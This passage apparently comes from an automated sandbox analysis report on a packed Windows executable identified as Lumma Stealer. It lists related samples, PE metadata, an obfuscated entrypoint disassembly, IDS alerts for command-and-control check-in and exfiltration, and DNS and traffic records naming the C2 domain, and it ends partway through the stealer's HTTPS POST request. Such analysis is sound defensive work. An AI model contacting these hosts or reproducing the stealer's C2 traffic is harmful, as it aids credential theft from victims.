                  file.exeGet hashmaliciousLummaCBrowse
                  • 172.67.157.26
                  file.exeGet hashmaliciousLummaCBrowse
                  • 104.21.48.252
                  zmal2LjhJa.exeGet hashmaliciousLummaCBrowse
                  • 172.67.157.26
                  htzTCFcIaP.exeGet hashmaliciousLummaCBrowse
                  • 172.67.157.26

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSLisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                  • 104.21.11.245
                  https://forms.office.com/r/qq9c20HBqaGet hashmaliciousTycoon2FABrowse
                  • 104.17.25.14
                  LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                  • 104.21.11.245
                  New order.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.96.3
                  LisectAVT_2403002A_328.exeGet hashmaliciousPetite VirusBrowse
                  • 172.65.251.78
                  LisectAVT_2403002A_328.exeGet hashmaliciousPetite VirusBrowse
                  • 172.65.251.78
                  http://link.mail.beehiiv.com/ss/c/u001.6C5fb2jgNhK_7sih4vM3VZa9fE9tHBc9fWZLirgY7_MATRo7_qx7xDq5ZlnkMcO1QobynJ6PiItP4Wtcapt8tiaBcTbWM1w1MHuIiN_t_ffA_hJhmN8MgAW_Y4IPUoI18R3nDq7jKhCU2UyzKyGI-fgPaHIzb3B6lUScBqw8xPWbXjB75jecemYLrKDX4KUr-zoRsTXM9LiZoNgvebiUwr439T1w9eWAafMqLUrMmXf67xVVD06E3Mfgln_ZkjRbhq6eRPto7d31e2ehnl7ulSLrJ4gjMw3GY4GdHZvuq26IrF7i22I755PxTKhdknNtngs2viqOUFQQVIP0HbwfHtnQ1psNsvMNcdTn_ikKemXjj5BG-TL68QdV2eLeME8V/48b/lZFswvdpTSWokKOzLlv9VQ/h6/h001.Y7M0U38MQ2nd1AVwnxBJwxsMy_vK5DUT5ew04LeckYc#KENT.GREEN@GELITA.COMGet hashmaliciousUnknownBrowse
                  • 172.67.196.116
                  LisectAVT_2403002A_337.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • 172.67.206.236
                  LisectAVT_2403002A_340.exeGet hashmaliciousCryptbotBrowse
                  • 104.21.76.57
                  EXTERNAL 9 Held.msgGet hashmaliciousUnknownBrowse
                  • 1.1.1.1

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  a0e9f5d64349fb13191bc781f81f42e1LisectAVT_2403002A_282.exeGet hashmaliciousXRedBrowse
                  • 104.21.48.252
                  LisectAVT_2403002A_250.exeGet hashmaliciousXRedBrowse
                  • 104.21.48.252
                  LisectAVT_2403002A_282.exeGet hashmaliciousXRedBrowse
                  • 104.21.48.252
                  LisectAVT_2403002A_328.exeGet hashmaliciousPetite VirusBrowse
                  • 104.21.48.252
                  LisectAVT_2403002A_328.exeGet hashmaliciousPetite VirusBrowse
                  • 104.21.48.252
                  LisectAVT_2403002A_420.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 104.21.48.252
                  LisectAVT_2403002A_425.dllGet hashmaliciousUnknownBrowse
                  • 104.21.48.252
                  LisectAVT_2403002A_428.exeGet hashmaliciousBlackMoonBrowse
                  • 104.21.48.252
                  LisectAVT_2403002A_425.dllGet hashmaliciousUnknownBrowse
                  • 104.21.48.252
                  LisectAVT_2403002A_428.exeGet hashmaliciousBlackMoonBrowse
                  • 104.21.48.252

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.957806131252642
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:LisectAVT_2403002A_236.exe
                  File size:5'735'941 bytes
                  MD5:8ecbc517b61cdb069495b3f3e3887a0f
                  SHA1:4b9170f6fe8e1b77fa1462efd4299930479f98cd
                  SHA256:4c98f158e7654d83e23027e9c94b5a6d27837c3e0302e0619b7540fe1387645e
                  SHA512:c0274591a8e799726bd1e80a3effbcc82ee9a776cca4e089801e14ddb921952cb2eab624e7c8cb5eaf55e74b14985503b3748b6b67d614b72758ad1703acb73a
                  SSDEEP:98304:+AMEgqpDZeqlCyxg5IrjgHRbPuZHqG6WAqAr7TF7IG0P9LYhHXihUK4TDqOf1pvz:+N1qRjlTxg56kHBPWAqAr7JGFLY4aKey
                  TLSH:5546233356271298D1E6C935CD37BDD071F707AA9B80E8B8A5E7B9C626329E0A313543
                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....8.e.................\............9...........@.......................................@...................................A....

                  File Icon

                  Icon Hash:00928e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x79f308
                  Entrypoint Section:.vmp1
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x65FB38B6 [Wed Mar 20 19:27:50 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:89c8abd38fd3ffc06ee06d01f9b3cbbf

                  Entrypoint Preview

                  Instruction
                  push 6A79FA46h
                  call 00007FC6591FEBDEh
                  ror eax, 1
                  clc
                  not eax
                  ror eax, 1
                  test sp, ax
                  test esp, 61F228B7h
                  not eax
                  xor ebx, eax
                  jmp 00007FC6591673F6h
                  jmp 00007FC6590FAC7Fh
                  mov dx, word ptr [edi]
                  rcr eax, cl
                  mov cl, byte ptr [edi+02h]
                  sub edi, 00000002h
                  not ah
                  shl dx, cl
                  movsx eax, ax
                  setb ah
                  mov word ptr [edi+04h], dx
                  cwde
                  movsx ax, cl
                  lahf
                  pushfd
                  shl ax, FFE2h
                  bswap eax
                  inc ax
                  pop dword ptr [edi]
                  xor ax, 00005BB0h
                  sar al, cl
                  or ax, sp
                  mov eax, dword ptr [ebp+00h]
                  cmp bp, si
                  test bx, 6FAFh
                  add ebp, 00000004h
                  clc
                  xor eax, ebx
                  not eax
                  test di, bp
                  clc
                  xor eax, 366F2619h
                  inc eax
                  jmp 00007FC65917EDDFh
                  lea esi, dword ptr [esi+00000004h]
                  xor ecx, ebx
                  clc
                  xor ecx, 1ED827EFh
                  rol ecx, 03h
                  xor ecx, 58B57741h
                  dec ecx
                  cmc
                  stc
                  rol ecx, 1
                  jmp 00007FC6595A7496h
                  test bp, bx
                  stc
                  and esi, 000000FFh
                  mov esi, dword ptr [0087C624h+esi*4]
                  cmp bx, dx
                  test bh, FFFFFF96h
                  shr eax, 08h
                  clc
                  stc
                  xor eax, esi
                  jmp 00007FC65908DFD7h

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4119cc0xdc.vmp1
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x8ec0000x59c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x88d0000x80.vmp1
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x35af20x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x370000x296b0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x3a0000xa2540x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .vmp00x450000x32e4b50x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .vmp10x3740000x577a400x577c00c93a0990598b704e596652d41a628154unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .reloc0x8ec0000x59c0x600a74a6e53709b351af4f1fd4f43819b3aFalse0.5078125data4.132619879851682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Imports

                  DLLImport
                  KERNEL32.dllExitProcess
                  ole32.dllCoCreateInstance
                  OLEAUT32.dllSysAllocString
                  USER32.dllCloseClipboard
                  GDI32.dllBitBlt
                  WTSAPI32.dllWTSSendMessageW
                  KERNEL32.dllVirtualQuery
                  USER32.dllGetProcessWindowStation
                  KERNEL32.dllLocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
                  USER32.dllGetProcessWindowStation, GetUserObjectInformationW

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                  2024-07-25T22:14:44.163830+0200UDP2051469ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (unhappytidydryypwto .shop)5436453192.168.2.91.1.1.1
                  2024-07-25T22:14:45.734706+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49706443192.168.2.9104.21.48.252
                  2024-07-25T22:15:01.133815+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971340.127.169.103192.168.2.9
                  2024-07-25T22:14:48.209574+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49708443192.168.2.9104.21.48.252
                  2024-07-25T22:14:44.698527+0200TCP2051476ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI)49706443192.168.2.9104.21.48.252
                  2024-07-25T22:14:55.547747+0200TCP2051476ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI)49712443192.168.2.9104.21.48.252
                  2024-07-25T22:14:46.553302+0200TCP2051476ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI)49707443192.168.2.9104.21.48.252
                  2024-07-25T22:14:50.869302+0200TCP2051476ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI)49710443192.168.2.9104.21.48.252
                  2024-07-25T22:14:53.722138+0200TCP2051476ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI)49711443192.168.2.9104.21.48.252
                  2024-07-25T22:14:47.703503+0200TCP2051476ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI)49708443192.168.2.9104.21.48.252
                  2024-07-25T22:14:48.905289+0200TCP2051476ET MALWARE Observed Lumma Stealer Related Domain (unhappytidydryypwto .shop in TLS SNI)49709443192.168.2.9104.21.48.252
                  2024-07-25T22:14:47.027495+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49707443192.168.2.9104.21.48.252
                  2024-07-25T22:14:49.759772+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49709443192.168.2.9104.21.48.252
                  2024-07-25T22:14:55.552815+0200TCP2843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M249712443192.168.2.9104.21.48.252

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 25, 2024 22:14:44.218904972 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:44.218944073 CEST44349706104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:44.219022989 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:44.228465080 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:44.228486061 CEST44349706104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:44.698277950 CEST44349706104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:44.698527098 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:44.702908993 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:44.702928066 CEST44349706104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:44.703309059 CEST44349706104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:44.748670101 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:45.066272974 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:45.066468000 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:45.066488028 CEST44349706104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:45.734740019 CEST44349706104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:45.734833956 CEST44349706104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:45.735290051 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:45.736958981 CEST49706443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:45.736990929 CEST44349706104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:45.745625973 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:45.745673895 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:45.745744944 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:45.746778011 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:45.746788979 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:46.553220987 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:46.553302050 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:46.554600000 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:46.554608107 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:46.555087090 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:46.556417942 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:46.556440115 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:46.556500912 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.027504921 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.027551889 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.027581930 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.027611017 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.027621984 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.027643919 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.027653933 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.027673960 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.027703047 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.027709961 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.027715921 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.027774096 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.028331995 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.028383970 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.028424025 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.028433084 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.029194117 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.029238939 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.029247046 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.032521963 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.032602072 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.032604933 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.032664061 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.032813072 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.032830000 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.032840967 CEST49707443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.032845974 CEST44349707104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.203974962 CEST49708443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.204011917 CEST44349708104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.204083920 CEST49708443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.204428911 CEST49708443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.204442024 CEST44349708104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.703392982 CEST44349708104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.703502893 CEST49708443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.704824924 CEST49708443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.704835892 CEST44349708104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.705116987 CEST44349708104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:47.706448078 CEST49708443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.706592083 CEST49708443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:47.706624031 CEST44349708104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.209574938 CEST44349708104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.209676027 CEST44349708104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.209748983 CEST49708443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.209811926 CEST49708443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.209834099 CEST44349708104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.382350922 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.382412910 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.382477045 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.382816076 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.382829905 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.905209064 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.905288935 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.910664082 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.910686970 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.911042929 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.912255049 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.912404060 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.912434101 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:48.912480116 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:48.912493944 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:49.759783983 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:49.759872913 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:49.759962082 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:49.760101080 CEST49709443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:49.760121107 CEST44349709104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:49.979443073 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:49.979489088 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:49.979556084 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:49.979994059 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:49.980010986 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:50.869209051 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:50.869302034 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:50.870553970 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:50.870563984 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:50.870795965 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:50.871887922 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:50.872010946 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:50.872033119 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:50.872104883 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:50.872112989 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:51.506937981 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:51.507039070 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:51.507102013 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:51.507281065 CEST49710443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:51.507307053 CEST44349710104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:52.872520924 CEST49711443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:52.872564077 CEST44349711104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:52.873255968 CEST49711443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:52.873255968 CEST49711443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:52.873300076 CEST44349711104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:53.722001076 CEST44349711104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:53.722137928 CEST49711443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:53.723784924 CEST49711443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:53.723793030 CEST44349711104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:53.724037886 CEST44349711104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:53.725655079 CEST49711443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:53.725655079 CEST49711443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:53.725692034 CEST44349711104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:54.124293089 CEST44349711104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:54.124382973 CEST44349711104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:54.124511957 CEST49711443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:54.125004053 CEST49711443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:54.125021935 CEST44349711104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.037812948 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.037868977 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.038079977 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.038305044 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.038321972 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.547630072 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.547746897 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.549112082 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.549120903 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.549438000 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.550777912 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.552035093 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.552088022 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.552191019 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.552221060 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.552453995 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.552514076 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.552809000 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.552835941 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.552977085 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.553006887 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.553178072 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.553205013 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.553215027 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.553226948 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.553359032 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.553385019 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.553406000 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.553484917 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.553513050 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.553525925 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.563524961 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.563695908 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.563728094 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.563731909 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.563750982 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:55.563769102 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.563797951 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.563815117 CEST49712443192.168.2.9104.21.48.252
                  Jul 25, 2024 22:14:55.566724062 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:57.114037037 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:57.114290953 CEST44349712104.21.48.252192.168.2.9
                  Jul 25, 2024 22:14:57.114371061 CEST49712443192.168.2.9104.21.48.252

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 25, 2024 22:14:44.163830042 CEST5436453192.168.2.91.1.1.1
                  Jul 25, 2024 22:14:44.181106091 CEST53543641.1.1.1192.168.2.9

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 25, 2024 22:14:44.163830042 CEST192.168.2.91.1.1.10xa315Standard query (0)unhappytidydryypwto.shopA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 25, 2024 22:14:44.181106091 CEST1.1.1.1192.168.2.90xa315No error (0)unhappytidydryypwto.shop104.21.48.252A (IP address)IN (0x0001)false
                  Jul 25, 2024 22:14:44.181106091 CEST1.1.1.1192.168.2.90xa315No error (0)unhappytidydryypwto.shop172.67.157.26A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • unhappytidydryypwto.shop

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.949706104.21.48.2524436236C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  TimestampBytes transferredDirectionData
                  2024-07-25 20:14:45 UTC271OUTPOST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: unhappytidydryypwto.shop
